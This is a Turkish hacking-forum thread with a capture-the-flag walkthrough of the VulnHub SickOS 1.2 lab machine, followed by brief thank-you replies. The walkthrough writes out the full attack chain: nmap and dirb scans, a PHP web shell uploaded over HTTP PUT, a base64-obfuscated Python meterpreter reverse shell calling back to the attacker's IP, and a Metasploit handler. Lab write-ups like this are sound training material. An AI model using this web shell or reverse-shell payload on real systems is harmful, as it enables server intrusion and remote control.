Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm


Pentest Challange: SickOS #Belvando

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 15-06-2017 19:59   #1
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Mantı V2
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 195


Thumbs up Pentest Challange: SickOS #Belvando



Arkadaşlar Merhaba

Bugün sizlere bir pentest challenge olan SickOS'un çözümünü anlatacağım.

Challenge dosyamızı şurdan rahtlıkla indirebilirsiniz.

https://download.vulnhub.com/sickos/sick0s1.2.zip
Eğer indirme ekranı gelmediyse direk bilgi sayfasınada ulaşabilirsiniz:
https://www.vulnhub.com/entry/sickos-12,144/

(Başlamadan önce şunu söylemek isterimki ben diğer challengelarıma ayırdığım saat ortalama 3-4 saat. Ancak bu anlaşılan fazla kolay olacakki 1 saatten az sürede tamamladım. Yeni başlayanların mantığını kavrayabilmesi için uğraşabileceği bir challenge.)


Hadi başlayalım

Her pentest çalışmasında olduğu gibi tarama yaparak başlayacağız.
Bağlı olduğumuz ağ cihazını öğrenmek için komutumu giriyorum.

route



Gateway üzerinden tarama yapacağız.
Kullanıcı taraması için -sP parametresini kullanarak subnetin içinde olan tüm kullanıcılara ping atarak aktifliğini anlayacaktir.
nmap -sP 192.168.43.1/24



Bu kısımda hedefimiz belli oldu. 192.168.43.143
Hedefimizde hangi servisleri çalıştığını öğrenmek istiyorsak yeniedn nmap i kullanıcaz.
nmap 192.168.43.143



Evet 2 servis çalışıyor.
22(ssh) ve 80(http) böyle bir durumda ssh bağlanmak pekte mantıklı olmaz çünkü bizden şifre isteyecektir.
Bizde daha önceki konularımdada yaptığım gibi 80 portuna giricez.




Tarayıcımızdan 80 portuna girdiğimizde böyle bir sonuç alıyoruz.
Zaten bir input yeri olmadığından ve alakasız bir görüntü olduğu için burda fazla zaman kaybetmek istemedim.
Http portuna fuzzer(dosya taraması) yapmaya başladım.
dirb http://192.168.43.143/



Evet test adında bir klasör olduğunu bize çıktıda verdi.
Bende hemen tarayıcımızdan burada neler döndüğüne bakmak istedim.




Ve içinin boş olduğunu öğrendik.
Ama heriçi boş dosya ilede birşey yapılamaz değilya.
Bende curl aracımı kullanarak bu siteye inject yapabilirmiyim diye soru yönelttim.
curl -v -X OPTIONS http://192.168.43.143/test



Bize PUT komutu çalıştırabilceğimizi söyledi.(Yani inject yapabilcez)
Bende bir önceki pentest challenge da yaptığımı yapıp buraya bir konsol çalıştırma php dosyası yükledim.
curl -X PUT -d '<?php system($_GET["cmd"]); ?>' http://192.168.43.143/test/ter.php



Komutumuzun işe yaradığını umarak test klasörüne yeniden döndüm.



Evet ter.php dosyası buraya düşmüş.
Çalışıp çalışmadığını test etmek için ls -l diyerek içerisindeki dosyaları göstermesini söyledim.
http://192.168.43.143/test/ter.php?cmd=ls -l



Karşımıza attığımız ter.php dosyasının bilgileri çıktı.
Bende bu kısmı kullanarak içeriye RAT atabilceğimi düşündüm.
Ve RATımızı hazırlamaya başladım.

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.43.200 lport=4964 R > /var/www/html/rat.py



RAT oluştuktan sonra karşı taraf dosyamı alması için apache2 servisimide çalıştırdım.
Ve ter.php dosyasından wget aracılığı ile elimdeki dosyayı alması gerektiğini belirttim.
Ama adamlar wget komutunu disenable olduğunu öğrendim.
Tabi biraz gereksiz bir düşünmeden sonra kolay bir bash komutuyla dosyayı atabilceğimi anladım.(Doğrusu dosya atmıcaz dosya oluşturcaz)
RAT dosyamın içini açtım ve hepsini kopyaladım, bu kopyamı şöyle basit bir yolla karşı tarafa iletip bir dosya oluşturulması gerektiğini söyledim.

Kod:
192.168.43.143/test/ter.php?cmd=echo "import  base64,sys;exec(base64.b64decode({2:str,3:lambda  b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjQzLjIwMCcsNDk2NCkpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))"  > rat.py
Yolladıktan sonra ter.php kısmından ls yaptığımda şöyle bir görüntü çıktı.



Evet RATımız başarılı bir biçimde karşı tarafa ulaştı ve artık çalıştırılması bekleniyor.
Tabi çalıştırmadan önce bir handler açmamız şart.

msfconsole -x "use multi/handler; set payload python/meterpreter/reverse_tcp; set lhost 192.168.43.200; set lport 4964; exploit "

Diyerek handlerımızı direk olarak hazırlıyoruz.
Hazır olduktan sonra artık RATımızı çalıştırabiliriz.

http://192.168.43.143/test/ter.php?cmd=python rat.py

Evet çalıştırdık ve artık handlerımıza bakabiliriz.



Gayet kolay bir şekilde challengeımızı bitirdik.

Eğer bunun gibi challangeların paylaşımını istiyorsanız teşekkür etmeyi unutmayın.
Elimde bir sürü challange var.
Eğer bir hatam olursa afola.
Birseferki konuda görüşmek dileğiyle.
Diğer konularımı şuradan ulaşabilirsiniz.
http://www.turkhackteam.org/search.p...rchid=10402235

HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.





___________________________________________

Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando

Konu Belvando tarafından (15-06-2017 21:24 Saat 21:24 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

JoseQual, enes190780, foreign Teşekkür etti.
Alt 15-06-2017 20:05   #2
  • Tamamen Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
05/2016
Nereden
Amazon
Mesajlar
Konular

Teşekkür (Etti): 626
Teşekkür (Aldı): 289




Ellerine sağlık çok iyi konu paylaşıyorsun
 Offline  
 
Alıntı ile Cevapla
Alt 15-06-2017 21:41   #3
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Mantı V2
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 195




Alıntı:
JoseQual´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık çok iyi konu paylaşıyorsun
Çok sağol



___________________________________________

Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando
 Offline  
 
Alıntı ile Cevapla
Alt 15-06-2017 21:44   #4
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
CTF
Yaş
26
Mesajlar
Konular
1

Teşekkür (Etti): 5
Teşekkür (Aldı): 5




Wow ben hardcore CTF oynarım diyorsun Ellerine sağlık : )



___________________________________________

TRUE
WAY
 Offline  
 
Alıntı ile Cevapla
Alt 16-06-2017 15:33   #5
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
09/2016
Nereden
/etc/shadow
Mesajlar
Konular

Teşekkür (Etti): 22
Teşekkür (Aldı): 614




teşekkürler dostum eline sağlık



___________________________________________

Eski Saldırı Timi Üyesi


sprach.ρнρ
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau